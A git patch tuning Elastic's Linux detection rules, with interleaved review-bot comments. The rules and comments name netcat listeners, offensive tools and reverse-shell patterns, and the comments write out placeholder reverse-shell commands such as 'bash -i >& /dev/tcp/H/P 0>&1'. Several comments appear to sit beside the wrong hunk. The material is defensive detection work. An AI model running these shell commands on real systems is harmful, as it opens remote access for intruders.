From c537fb9c228a8a3aeaf42b545f7699e60bf5d304 Mon Sep 17 00:00:00 2001 From: Ruben Groenewoud <78494512+Aegrah@users.noreply.github.com> Date: Thu, 7 Mar 2024 10:46:48 +0100 Subject: [PATCH] [Tuning] Linux DR Tuning - Part 7 (#3458) * [Tuning] Linux DR Tuning - Part 7 * Update execution_potential_hack_tool_executed.toml --------- Co-authored-by: Colson Wilhoit <48036388+DefSecSentinel@users.noreply.github.com> --- .../execution_nc_listener_via_rlwrap.toml | 14 +++++------ ...xecution_potential_hack_tool_executed.toml | 17 +++++++------- ..._process_started_from_process_id_file.toml | 21 +++++++++++------ rules/linux/execution_python_tty_shell.toml | 23 ++++++++++++------- ...xecution_shell_via_background_process.toml | 15 ++++++++---- 5 files changed, 56 insertions(+), 34 deletions(-) diff --git a/rules/linux/execution_nc_listener_via_rlwrap.toml b/rules/linux/execution_nc_listener_via_rlwrap.toml index a08fcd393..937fb7839 100644 --- a/rules/linux/execution_nc_listener_via_rlwrap.toml +++ b/rules/linux/execution_nc_listener_via_rlwrap.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/10/30" +updated_date = "2024/02/20" [rule] author = ["Elastic"] @@ -21,7 +21,7 @@ false_positives = [ """, ] from = "now-9m" -index = ["logs-endpoint.events.*"] +index = ["logs-endpoint.events.*", "endgame-*"] language = "eql" license = "Elastic License v2" name = "Netcat Listener Established via rlwrap" 
@@ -59,15 +59,15 @@ tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", - "Data Source: Elastic Defend" + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" ] timestamp_override = "event.ingested" type = "eql" query = ''' -process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and -process.name == "rlwrap" and process.args in ( - "nc", "ncat", "netcat", "nc.openbsd", "socat" -) and process.args : "*l*" and process.args_count >= 4 +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and +process.name == "rlwrap" and process.args in ("nc", "ncat", "netcat", "nc.openbsd", "socat") and +process.args : "*l*" and process.args_count >= 4 ''' [[rule.threat]] diff --git a/rules/linux/execution_potential_hack_tool_executed.toml b/rules/linux/execution_potential_hack_tool_executed.toml index 7d116f4cd..04a496659 100644 --- a/rules/linux/execution_potential_hack_tool_executed.toml +++ b/rules/linux/execution_potential_hack_tool_executed.toml @@ -1,8 +1,8 @@ [metadata] creation_date = "2023/09/22" -integration = ["endpoint"] +integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2023/10/30" +updated_date = "2024/02/20" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -14,7 +14,7 @@ this rule should be investigated further, as hack tools are commonly used by blu well. """ from = "now-9m" -index = ["logs-endpoint.events.*", "endgame-*"] +index = ["logs-endpoint.events.*", "endgame-*", "auditbeat-*", "logs-auditd_manager.auditd-*"] language = "eql" license = "Elastic License v2" name = "Potential Linux Hack Tool Launched" 
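Review bot: The last line of the reformatted query still keys the "listener" decision on `process.args : "*l*"`, which is satisfied by any argument containing the letter l in either case (EQL `:` is case-insensitive), so an outbound `rlwrap nc some.local.host 4444` fires this rule just as a `-lvnp` listener does, despite the rule name. Anchoring the wildcard to option-looking tokens keeps the nc, ncat and socat listener forms while dropping hostnames and paths, e.g. `process.args : ("-l*", "-*l*", "*listen*")` (covers `-l`, `-lvnp`, `-vlp`, `--listen` and socat `TCP-LISTEN:`). Separately, `process.args in ("nc", "ncat", ...)` is an exact-token match, so `rlwrap /usr/bin/nc -l 4444` does not match; if that is intended to reduce noise, a `// bare names only` comment would make it deliberate rather than an oversight.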
@@ -49,17 +49,19 @@ For more details on Elastic Defend refer to the [helper guide](https://www.elast """ severity = "medium" timestamp_override = "event.ingested" -tags = ["Domain: Endpoint", +tags = [ + "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", - "Data Source: Elastic Defend" + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" ] type = "eql" query = ''' -process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and -process.name in ( +process where host.os.type == "linux" and event.action in ("exec", "exec_event", "executed", "process_started") and +event.type == "start" and process.name in ( // exploitation frameworks "crackmapexec", "msfconsole", "msfvenom", "sliver-client", "sliver-server", "havoc", // network scanners (nmap left out to reduce noise) @@ -84,4 +86,3 @@ framework = "MITRE ATT&CK" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml index c70c71ee0..0811a8e8f 100644 --- a/rules/linux/execution_process_started_from_process_id_file.toml +++ b/rules/linux/execution_process_started_from_process_id_file.toml @@ -1,10 +1,10 @@ [metadata] creation_date = "2022/05/11" -integration = ["endpoint"] +integration = ["endpoint", "auditd_manager"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/11/02" +updated_date = "2024/02/20" [rule] author = ["Elastic"] 
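Review bot: The widened `event.action in ("exec", "exec_event", "executed", "process_started")` on the new query line gives no hint which data source produces which value, and the next maintainer who prunes the list will have to rediscover it. From the tags and `index` entries this patch adds, the mapping appears to be Defend/Endgame for the first two and auditd_manager/auditbeat for the last two; a comment on the line above the query, `// exec: Elastic Defend, exec_event: Elastic Endgame, executed/process_started: auditd_manager and auditbeat process events`, would pin that down, adjusted if the inferred mapping is wrong. The `process.name in (` list this hunk opens continues outside the hunk, so its remaining entries were not reviewed here.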
@@ -21,7 +21,7 @@ false_positives = [ """, ] from = "now-9m" -index = ["logs-endpoint.events.*", "endgame-*"] +index = ["logs-endpoint.events.*", "endgame-*", "auditbeat-*", "logs-auditd_manager.auditd-*"] language = "eql" license = "Elastic License v2" name = "Process Started from Process ID (PID) File" @@ -69,7 +69,16 @@ For more details on Elastic Defend refer to the [helper guide](https://www.elast """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Threat: BPFDoor", "Data Source: Elastic Endgame", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ] timestamp_override = "event.ingested" type = "eql" @@ -78,17 +87,15 @@ process where host.os.type == "linux" and event.type == "start" and user.id == " process.executable regex~ """/var/run/\w+\.(pid|lock|reboot)""" ''' - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/linux/execution_python_tty_shell.toml b/rules/linux/execution_python_tty_shell.toml index b6129d5f6..243bf6daa 100644 --- a/rules/linux/execution_python_tty_shell.toml +++ b/rules/linux/execution_python_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/15" integration = ["endpoint"] maturity = "production" -updated_date = "2023/11/02" +updated_date = "2024/02/20" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" 
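Review bot: Adding `auditbeat-*` and `logs-auditd_manager.auditd-*` to `index` only extends coverage if those sources populate the fields the query filters on, which per the later hunk are `user.id` and `process.executable` (`regex~ """/var/run/\w+\.(pid|lock|reboot)"""`), and auditd itself only emits execve events when an audit rule for execve is loaded on the host. If the rule's setup guide does not already say so, a sentence noting that prerequisite, and a quick check that a sample `executed` / `process_started` event carries both fields, would avoid the rule silently never matching on the new sources. The query body is referenced only as hunk context and its opening line is outside this hunk.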
@@ -47,11 +47,18 @@ For more details on Elastic Defend refer to the [helper guide](https://www.elast """ severity = "high" timestamp_override = "event.ingested" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ] type = "eql" query = ''' -process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and ( (process.parent.name : "python*" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and process.parent.args_count >= 3 and process.parent.args : "*pty.spawn*" and process.parent.args : "-c") or @@ -60,18 +67,18 @@ process where host.os.type == "linux" and event.action in ("exec", "exec_event") ) ''' - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] - id = "T1059.006" - name = "Python" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/linux/execution_shell_via_background_process.toml b/rules/linux/execution_shell_via_background_process.toml index 66e4580b3..c56a6b593 100644 --- a/rules/linux/execution_shell_via_background_process.toml +++ b/rules/linux/execution_shell_via_background_process.toml 
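Review bot: The new query line opens a two-branch expression with no comment saying what each branch detects, and the branch it starts (`process.parent.name : "python*"` with `process.parent.args : "*pty.spawn*"` and `"-c"`) is only readable once the reader knows the `python -c 'import pty; pty.spawn(...)'` upgrade pattern. Since this patch already uses `//` comments inside an EQL query (the hack-tool rule), a line such as `// interactive shell spawned by an inline python -c script calling pty.spawn` above the first branch would document it without changing behaviour. The enclosing query, including the second branch, continues outside this hunk and was not reviewed here.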
@@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/11/02" +updated_date = "2024/02/20" [rule] author = ["Elastic"] @@ -13,7 +13,7 @@ Monitors for the execution of background processes with process arguments capabl channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further. """ from = "now-9m" -index = ["logs-endpoint.events.*"] +index = ["logs-endpoint.events.*", "endgame-*"] language = "eql" license = "Elastic License v2" name = "Potential Reverse Shell via Background Process" @@ -47,10 +47,17 @@ For more details on Elastic Defend refer to the [helper guide](https://www.elast """ severity = "medium" timestamp_override = "event.ingested" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ] type = "eql" query = ''' -process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and process.name in ("setsid", "nohup") and process.args : "*/dev/tcp/*0>&1*" and process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") '''
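Review bot: The parent shell list on the last query line, `("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")`, omits `ash`, which the python TTY shell rule touched in this same patch includes, so the two rules now disagree on the same concept for no stated reason; adding `"ash"` (or a comment explaining the omission) would keep them consistent. The argument pattern `"*/dev/tcp/*0>&1*"` also pins the canonical `bash -i >& /dev/tcp/H/P 0>&1` form only; the equally common `/dev/udp/` variant and the `exec 5<>/dev/tcp/H/P` file-descriptor form are missed, and `process.args : ("*/dev/tcp/*0>&1*", "*/dev/udp/*0>&1*", "*<>/dev/tcp/*")` would cover them with the same parent/child constraints. Whether that widening is acceptable for the rule's noise budget is a judgement call that the false_positives section (outside this hunk) should reflect.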